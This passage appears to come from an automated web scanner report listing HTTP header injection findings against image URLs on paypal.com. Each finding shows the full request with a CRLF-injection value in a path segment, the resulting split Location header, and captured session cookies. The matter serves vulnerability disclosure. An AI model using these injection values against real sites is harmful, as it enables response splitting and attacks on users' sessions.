KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:59 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/b23e9
e2f00b27246/pui/core/btn_bg_sprite.gif
Content-Length: 289
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.43. https://www.paypal.com/en_US/i/pui/core/btn_bg_sprite.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/btn_bg_sprite.gif

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 8eced%0d%0a281082c914a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /en_US/i/8eced%0d%0a281082c914a/core/btn_bg_sprite.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:03 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/i/8eced
281082c914a/core/btn_bg_sprite.gif
Content-Length: 287
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.44. https://www.paypal.com/en_US/i/pui/core/btn_bg_sprite.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/btn_bg_sprite.gif

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload c8454%0d%0aef62108b4fc was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /en_US/i/pui/c8454%0d%0aef62108b4fc/btn_bg_sprite.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:07 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/i/pui/c8454
ef62108b4fc/btn_bg_sprite.gif
Content-Length: 286
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.45. https://www.paypal.com/en_US/i/pui/core/icon_content_arrow.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/icon_content_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 546b3%0d%0a558a89c1835 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /546b3%0d%0a558a89c1835/i/pui/core/icon_content_arrow.gif HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=XbXubGedWJ4U7Znb8GSoKUyPDl-WoYZbW3BHESKTcAT5OSCVz1BOP2tJODS&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c; s_sess=%20v20%3Dxss%3B%20s_cc%3Dtrue%3B%20tr_p1%3Dcore%2520four%2520pane%3B%20s_ppv%3D86%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3Dcore%2520four%2520pane%255E%255ECreate%2520a%2520Business%2520Account%255E%255Ecore%2520four%2520pane%2520%257C%2520Create%2520a%2520Business%2520Account%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253Dcore%25252520four%25252520pane%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.paypal.com%2525252Fus%2525252Fcgi-bin%2525252F%2525253Fcmd%2525253D_pro-nonpro-welcome%252526ot%25253DA%3B; s_pers=%20gpv_c43%3Dcore%2520four%2520pane%7C1313162940186%3B%20gpv_events%3Dno%2520value%7C1313162941622%3B; navcmd=_pro-nonpro-welcome; cwrClyrK4LoCV1fydGbAxiNL6iG=MLQqxuwrfNB4GCgi5Tc5nJR8jQoFWYGnrVmOftTlbwLloOZ8AWj2pVAjVw2e_bZWPiiWgINZlRwMRCbOjtKn9n894IGC1O3m73c9x6j45AugHBvkMZ0i63Io-yJukjjq4BkaMm%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c1313160185; SPARTAJSESSIONID=b06ee16a91333; LANG=en_US%3BUS; analytics=CKeARvOya9OWJDVyrX9LvkWswAVYeWxwPyN-.DSCPeZ2ADt8p9zRetf0dzbeiMh07BSmxNe8tAZL4MlLG3fn.DLRhnce19-yE6Ssc7YyvKpgnYCRVainDwu5zp.3ddUZBwXvO49Skf8; cookie_welcome=welcome; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=jQo7sydPuuBqzheXyjgXVZ0Sh79IlbRwsmMUyXTbpOm18ra89H1dlxMiD9wWaJVbYK4n1G2NkBX1axYq69u0gtRb7aicBx2oogcN3p1x8rmWNJUt2wFa1qiTLrr7bnc6IDW2z7Nh7k4RT13aDBtSuUqLLbeEL_3BR2aDYd-kJOrGV1zE52mDN_BdlUvEoCd17m0j4NVDy1OF77TlROadlfAjNggeJAIspjLmn6KMh__vMNcMAiOv8BZMbsRZuzgT72_8qVkPqt2ql--OZsxgGY2o_3xkGtkBtYqPvsq-xh_aprULej602LIQU7DVZ2D40ce3LTL0aQpRgaKTxc1IgOsxT2ZGgV_Y0YYbwZShFNy4ys52

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:58:39 GMT
Server: Apache
Location: https://www.paypalobjects.com/546b3
558a89c1835/i/pui/core/icon_content_arrow.gif
Content-Length: 290
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.46. https://www.paypal.com/en_US/i/pui/core/icon_content_arrow.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/icon_content_arrow.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 51580%0d%0a8890fc1af31 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /en_US/51580%0d%0a8890fc1af31/pui/core/icon_content_arrow.gif HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=XbXubGedWJ4U7Znb8GSoKUyPDl-WoYZbW3BHESKTcAT5OSCVz1BOP2tJODS&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c; s_sess=%20v20%3Dxss%3B%20s_cc%3Dtrue%3B%20tr_p1%3Dcore%2520four%2520pane%3B%20s_ppv%3D86%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3Dcore%2520four%2520pane%255E%255ECreate%2520a%2520Business%2520Account%255E%255Ecore%2520four%2520pane%2520%257C%2520Create%2520a%2520Business%2520Account%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253Dcore%25252520four%25252520pane%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.paypal.com%2525252Fus%2525252Fcgi-bin%2525252F%2525253Fcmd%2525253D_pro-nonpro-welcome%252526ot%25253DA%3B; s_pers=%20gpv_c43%3Dcore%2520four%2520pane%7C1313162940186%3B%20gpv_events%3Dno%2520value%7C1313162941622%3B; navcmd=_pro-nonpro-welcome; cwrClyrK4LoCV1fydGbAxiNL6iG=MLQqxuwrfNB4GCgi5Tc5nJR8jQoFWYGnrVmOftTlbwLloOZ8AWj2pVAjVw2e_bZWPiiWgINZlRwMRCbOjtKn9n894IGC1O3m73c9x6j45AugHBvkMZ0i63Io-yJukjjq4BkaMm%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c1313160185; SPARTAJSESSIONID=b06ee16a91333; LANG=en_US%3BUS; analytics=CKeARvOya9OWJDVyrX9LvkWswAVYeWxwPyN-.DSCPeZ2ADt8p9zRetf0dzbeiMh07BSmxNe8tAZL4MlLG3fn.DLRhnce19-yE6Ssc7YyvKpgnYCRVainDwu5zp.3ddUZBwXvO49Skf8; cookie_welcome=welcome; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=jQo7sydPuuBqzheXyjgXVZ0Sh79IlbRwsmMUyXTbpOm18ra89H1dlxMiD9wWaJVbYK4n1G2NkBX1axYq69u0gtRb7aicBx2oogcN3p1x8rmWNJUt2wFa1qiTLrr7bnc6IDW2z7Nh7k4RT13aDBtSuUqLLbeEL_3BR2aDYd-kJOrGV1zE52mDN_BdlUvEoCd17m0j4NVDy1OF77TlROadlfAjNggeJAIspjLmn6KMh__vMNcMAiOv8BZMbsRZuzgT72_8qVkPqt2ql--OZsxgGY2o_3xkGtkBtYqPvsq-xh_aprULej602LIQU7DVZ2D40ce3LTL0aQpRgaKTxc1IgOsxT2ZGgV_Y0YYbwZShFNy4ys52

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:58:44 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/51580
8890fc1af31/pui/core/icon_content_arrow.gif
Content-Length: 294
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.47. https://www.paypal.com/en_US/i/pui/core/icon_content_arrow.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/icon_content_arrow.gif

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c1fe2%0d%0af67d387261f was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /en_US/i/c1fe2%0d%0af67d387261f/core/icon_content_arrow.gif HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=XbXubGedWJ4U7Znb8GSoKUyPDl-WoYZbW3BHESKTcAT5OSCVz1BOP2tJODS&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c; s_sess=%20v20%3Dxss%3B%20s_cc%3Dtrue%3B%20tr_p1%3Dcore%2520four%2520pane%3B%20s_ppv%3D86%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3Dcore%2520four%2520pane%255E%255ECreate%2520a%2520Business%2520Account%255E%255Ecore%2520four%2520pane%2520%257C%2520Create%2520a%2520Business%2520Account%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253Dcore%25252520four%25252520pane%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.paypal.com%2525252Fus%2525252Fcgi-bin%2525252F%2525253Fcmd%2525253D_pro-nonpro-welcome%252526ot%25253DA%3B; s_pers=%20gpv_c43%3Dcore%2520four%2520pane%7C1313162940186%3B%20gpv_events%3Dno%2520value%7C1313162941622%3B; navcmd=_pro-nonpro-welcome; cwrClyrK4LoCV1fydGbAxiNL6iG=MLQqxuwrfNB4GCgi5Tc5nJR8jQoFWYGnrVmOftTlbwLloOZ8AWj2pVAjVw2e_bZWPiiWgINZlRwMRCbOjtKn9n894IGC1O3m73c9x6j45AugHBvkMZ0i63Io-yJukjjq4BkaMm%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c1313160185; SPARTAJSESSIONID=b06ee16a91333; LANG=en_US%3BUS; analytics=CKeARvOya9OWJDVyrX9LvkWswAVYeWxwPyN-.DSCPeZ2ADt8p9zRetf0dzbeiMh07BSmxNe8tAZL4MlLG3fn.DLRhnce19-yE6Ssc7YyvKpgnYCRVainDwu5zp.3ddUZBwXvO49Skf8; cookie_welcome=welcome; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=jQo7sydPuuBqzheXyjgXVZ0Sh79IlbRwsmMUyXTbpOm18ra89H1dlxMiD9wWaJVbYK4n1G2NkBX1axYq69u0gtRb7aicBx2oogcN3p1x8rmWNJUt2wFa1qiTLrr7bnc6IDW2z7Nh7k4RT13aDBtSuUqLLbeEL_3BR2aDYd-kJOrGV1zE52mDN_BdlUvEoCd17m0j4NVDy1OF77TlROadlfAjNggeJAIspjLmn6KMh__vMNcMAiOv8BZMbsRZuzgT72_8qVkPqt2ql--OZsxgGY2o_3xkGtkBtYqPvsq-xh_aprULej602LIQU7DVZ2D40ce3LTL0aQpRgaKTxc1IgOsxT2ZGgV_Y0YYbwZShFNy4ys52

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:58:49 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/i/c1fe2
f67d387261f/core/icon_content_arrow.gif
Content-Length: 292
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.48. https://www.paypal.com/en_US/i/pui/core/icon_content_arrow.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/icon_content_arrow.gif

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 6f9d3%0d%0a532ad20727a was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /en_US/i/pui/6f9d3%0d%0a532ad20727a/icon_content_arrow.gif HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=XbXubGedWJ4U7Znb8GSoKUyPDl-WoYZbW3BHESKTcAT5OSCVz1BOP2tJODS&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c; s_sess=%20v20%3Dxss%3B%20s_cc%3Dtrue%3B%20tr_p1%3Dcore%2520four%2520pane%3B%20s_ppv%3D86%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3Dcore%2520four%2520pane%255E%255ECreate%2520a%2520Business%2520Account%255E%255Ecore%2520four%2520pane%2520%257C%2520Create%2520a%2520Business%2520Account%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253Dcore%25252520four%25252520pane%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.paypal.com%2525252Fus%2525252Fcgi-bin%2525252F%2525253Fcmd%2525253D_pro-nonpro-welcome%252526ot%25253DA%3B; s_pers=%20gpv_c43%3Dcore%2520four%2520pane%7C1313162940186%3B%20gpv_events%3Dno%2520value%7C1313162941622%3B; navcmd=_pro-nonpro-welcome; cwrClyrK4LoCV1fydGbAxiNL6iG=MLQqxuwrfNB4GCgi5Tc5nJR8jQoFWYGnrVmOftTlbwLloOZ8AWj2pVAjVw2e_bZWPiiWgINZlRwMRCbOjtKn9n894IGC1O3m73c9x6j45AugHBvkMZ0i63Io-yJukjjq4BkaMm%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c1313160185; SPARTAJSESSIONID=b06ee16a91333; LANG=en_US%3BUS; analytics=CKeARvOya9OWJDVyrX9LvkWswAVYeWxwPyN-.DSCPeZ2ADt8p9zRetf0dzbeiMh07BSmxNe8tAZL4MlLG3fn.DLRhnce19-yE6Ssc7YyvKpgnYCRVainDwu5zp.3ddUZBwXvO49Skf8; cookie_welcome=welcome; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=jQo7sydPuuBqzheXyjgXVZ0Sh79IlbRwsmMUyXTbpOm18ra89H1dlxMiD9wWaJVbYK4n1G2NkBX1axYq69u0gtRb7aicBx2oogcN3p1x8rmWNJUt2wFa1qiTLrr7bnc6IDW2z7Nh7k4RT13aDBtSuUqLLbeEL_3BR2aDYd-kJOrGV1zE52mDN_BdlUvEoCd17m0j4NVDy1OF77TlROadlfAjNggeJAIspjLmn6KMh__vMNcMAiOv8BZMbsRZuzgT72_8qVkPqt2ql--OZsxgGY2o_3xkGtkBtYqPvsq-xh_aprULej602LIQU7DVZ2D40ce3LTL0aQpRgaKTxc1IgOsxT2ZGgV_Y0YYbwZShFNy4ys52

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:58:54 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/i/pui/6f9d3
532ad20727a/icon_content_arrow.gif
Content-Length: 291
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
